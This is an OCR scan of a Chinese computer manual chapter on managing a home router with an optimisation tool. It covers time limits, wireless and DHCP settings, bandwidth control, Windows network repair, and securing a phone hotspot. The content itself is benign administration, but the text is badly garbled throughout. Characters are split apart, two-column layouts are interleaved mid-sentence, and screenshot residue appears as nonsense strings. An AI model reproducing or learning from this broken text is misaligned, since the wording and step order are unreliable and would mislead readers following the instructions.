下 载 速度 及 上 网 时 间 等 信息 。 


单 击 “ 添 加 允许 上 网 时 间 段 ” 超 链 
接 ， 即 可 打开 上 网 时 间 段 的 设置 界面 ， 在 
tse tate 开始 时 间 和 结 
束 时 间 等 信息 。 


对 间 纲 洪 述 “上 94 后 不 上 列 ] 


Feal 间 | 0 “| 对 [00 |] 


sm | | 对 |00 9 


mx [Fs-1[ a m=? ma rad [m9 ne? 
Bs 


step 国 单 击 “ 确 定 ” 按 钮 ， 即 可 完成 上 网 时 
间 段 的 设置 操作 。 


上 网 时 间 设 豆 


上 班 时 间 趟 
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step 园 单 去 “应 用 管理 ”图 标 ， 即 可 进入 
“应 用 管理 ”工作 界面 ， 在 其 中 可 以 看 到 
路 由 优化 大 师 为 用 户 提供 的 应 用 程序 。 


Er 
于 :1.010 大 小 : 47 


已 针尖 号 份 生 定 
aa 新 二 -1917 证 少 _ 199kR 


直到 服务 到 
钱 二 -1015 大 小 1585B 


step 图 如 果 想 要 使 用 某 个 应 用 程序 ， 则 可 以 
单 击 某 应 用 程序 下 的 “进入 ”按钮 ， 进 入 
该 应 用 程序 的 设置 界面 。 


允许 接 入 设备 列表 


EE 


1 Nace 


HREF 


step 因 单 去 “路 由 设置 ”图 标 ， 在 打开 的 界 
面 中 可 以 查看 当前 路 由 器 的 设置 信息 。 


CE FT 


< 


step 贺 选择 左 侧 的 “上 网 设置 ”选项 ， 在 
打开 的 界面 中 可 以 对 当前 的 上 网 信息 进行 
设置 。 
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[step 图 选择 “无 线 设置 ”选项 ， 在 打开 的 界 
面 中 可 以 对 路 由 的 无 线 功能 进行 开关 及 对 
名 称 、 密 码 等 信息 进行 设置 。 


step 图 选择 “LAN 口 设置 ”选项 ， 在 打开 的 
界面 中 可 以 对 路 由 的 LAN 口 进行 设置 。 


[ WH ee pe me 


Step 加 选择 “DHCP 服务 器 ”选项 ， 在 打开 


的 界面 中 可 以 对 路 由 的 DHCP 服 务 器 进行 
设置 。 
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a 

: a ee as 
| sm | 

| 

| | x | 

| 3 

= [Eee 图 选择 “重启 和 恢复 出 厂 ” 选 项 ， 在 打 

[Se 图 选择 “在 线 升级 ” 选项 ， 在 打开 的 界 开 的 界面 中 可 以 对 当前 路 由 器 进行 重启 和 

面 中 可 以 对 路 由 优化 大 师 的 版 本 进行 升级 ， 恢 复出 三 设置 。 

操作 。 es 


| mma | 
Ey 
| wavet | 
Bg 选择 “系统 日 志 ” 选 项 ， 在 打开 的 
ee 界面 中 可 以 查看 当前 路 由 器 的 系统 日 志 
一 信息 。 
[see 本 迁 择 “修改 管理 员 密 码 ” 选 项 ， 在 [全 二 二 
打开 的 界面 中 可 以 对 管理 员 窗 码 进行 修改 这 " 


设置 。 


砚 ] 而 ] Sse fs ey 


-- | 
[Bp 图 路 由 器 设备 设置 完毕 后 ， 返 回 到 路 由 
优化 大 师 的 工作 界面 中 ， 选 择 “ 防 路 网 ” 
选项 ， 在 打开 的 界面 中 可 以 设置 进行 防 足 
[Eee 图 选择 “备份 和 载 入 配置 ”选项 ， 在 打 网 设置 。 

开 的 界面 中 可 以 对 当前 路 由 器 的 配置 进行 

备份 和 载 入 设置 。 


| 
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下 
可 


999|i 
00 


0.00wa 


选择 “ 屏 广 告 ” 选项 ， 在 打开 的 界面 
中 可 以 设置 过 滤 广 告 是 否 开局。 


[ses 图 单 去 “开启 测速 ”按钮 ， 即 可 对 当前 
网 络 进行 测速 操作 ， 测 出 来 的 结果 显示 在 


La 工作 界面 中 。 


step 图 单 击 “开启 广告 过 滤 ” 按 钮 ， 即 可 开 
视频 过 滤 广 告 功能 。 
启 视频 过 滤 广 告 功能 一 


17.5 “实战 演练 


-ED 实战 演练 1 一 一 控制 无 线 网 中 设备 的 上 网 
速度 

[step 图 单 击 “ 立 即 清理 ” 按 钮 ， 即 可 清理 广 在 无 线 局 域 网 中 所 有 的 终端 设备 都 是 
告 信息 。 通过 路 由 器 上 网 的 ， 为 了 更 好 地 管理 各 个 
”| 终端 设备 的 上 网 情况 ， 管 理 员 可 以 通过 路 
由 器 控制 上 网 设备 的 上 网 速度 ， 具 体 的 操 

作 步 又 如 下 。 
aa [see 国 打开 路 由 器 的 Web 后 台 设 置 界面 ， 在 
A 其 中 选择 “IP 宽 带 控制 ”选项 ， 在 右 侧 的 窗 


格 中 可 以 查看 相关 的 功能 信息 。 


step 国 选择 “ 测 网 速 ” 选 项 ， 进 入 网 速 测试 
设置 界面 。 
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EU [step 图 诊断 完成 后 ， 将 会 在 下 方 的 窗 格 中 显 
示 诊 断 的 结果 。 


司 Windews 网 络 $ 新 


其 余 修复 拧 作 需要 具有 管理 员 权限 


i 
透 避 器 以 太 网 "已 禁 用 9 


[ 
7 


勾 选 “开启 IP 宽 带 控制 » 复 选 框 ， 即 时 兰 试 以 管理 员 身 份 进行 这 些 修复 

可 在 下 方 的 设置 区 域 中 对 设备 的 上 行 总 宽 本 

带 和 下 行 总 宽带 数 进行 设 置 ， 进 而 控制 终 |， 

端 设置 的 上 网 速度 。 | EE 


单 击 “尝试 以 管理 员 身 份 进 行 这 些 修 
[ge 


复 ” 连 接 ， 即 可 开始 对 诊断 出 来 的 问题 进 
| | 行 修复 。 


正在 解决 问题 
= | 和 
实战 演练 2 一 一 诊断 和 修复 网 络 不 通 的 问题 
当 计 算 机 不 能 上 网 时 ， 说 明 计算 机 与 
网 络 连接 不 通 ， 这 时 就 需要 诊断 和 修复 网 | Ea] 
络 了 ， 具 体 的 操作 步骤 如 下 。 | 


[ep 国 打开 “网 络 连接 ”窗口 ， 右 击 需要 诊 [ep 国 修复 完毕 后 ， 会 给 出 修复 的 结果 ， 提 
断 的 网 络 图 标 ， 在 弹出 的 快捷 菜单 中 选择 ， 示 用 户 疑 难 解答 已 经 完成 ， 并 在 下 方 显 示 
“诊断 ”选项 ， 弹 出 “Windows 网 络 诊断 ” 已 修复 信息 提示 。 

对 话 框 ， 并 显示 网 络 诊断 的 进度 。 x 


司 Windcws 网 络 允 新 


加 Windows 网 者 4 新 疑难 解答 已 充 成 


正在 检测 问题 居 难 相 答 对 系统 法 行 了 一 此 更 帮 ， 雪 之 前 名 等 江 执行 的 任务 
已 找到 问题 
适时 -以太 网 已 禁用 已 修复 © 


一 关闭 蜂 难 解答 


全 浏览 其他 选项 


到 大 六 到 信息 
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17.6 小 试 身手 / 质 HUAWEI C8815 


加 练习 1: 加 密 手机 的 WLAN 热 点 功能 


3 为 保证 手机 的 安全 ， 一 般 需要 给 手机 | Ee 
的 WLAN 热 点 功能 添加 密码 ， 具 体 的 操作 

步骤 如 下 。 

[es 图 在 手机 的 移动 热点 设置 界面 中 ， 点 按 
eA pg 在 弹出 的 界面 ”练习 2: 通过 修改 WiFi 名 称 隐藏 路 由 器 
中 点 按 “ 开 放 ” 选 项 ， 可 以 选择 手机 设备 WiFi 的 名 称 通常 是 指 路 由 器 当中 SSID 
的 加 密 方式 。 号 的 名 称 ， 该 名 称 可 以 根据 自己 的 需要 进 

本 行 修 改 ， 具 体 的 操作 步骤 如 下 。 

[Sep 国 打开 路 由 器 的 Web 后 台 设 置 界面 ， 在 
其 中 选择 “无 线 设置 ”选项 下 的 “基本 设 
置 ” 选 项 ， 打 开 “ 无 线 网 络 基 本 设置 ” 工 
作 界 面 。 


日 rwnassk x 于 re a 


下 - 步 


HUAWEI C8815 


开放 


[step 图 选择 好 加 密 方式 后 ， 即 可 在 下 方 显示 
密码 输入 框 ， 在 其 中 输入 密码 ， 然 后 单 击 
“保存 ”按钮 。 


step 图 将 SSID 号 的 名 称 由 “TP-LINK1” 修 
改 为 “WiFi”， 单 击 “ 保 存 ” 按 钮 ， 即 可 
保存 修改 后 的 WiFi 名 称 。 


昌 Tewnass x 于 - OO x 


HUAWEI C8815 


WPA PSK 


Step 图 加 密 完成 后 ， 使 用 电脑 再 连接 手机 设 
备 时 ， 系 统 提 示 用 户 输 入 网 络 安全 密 钥 。 
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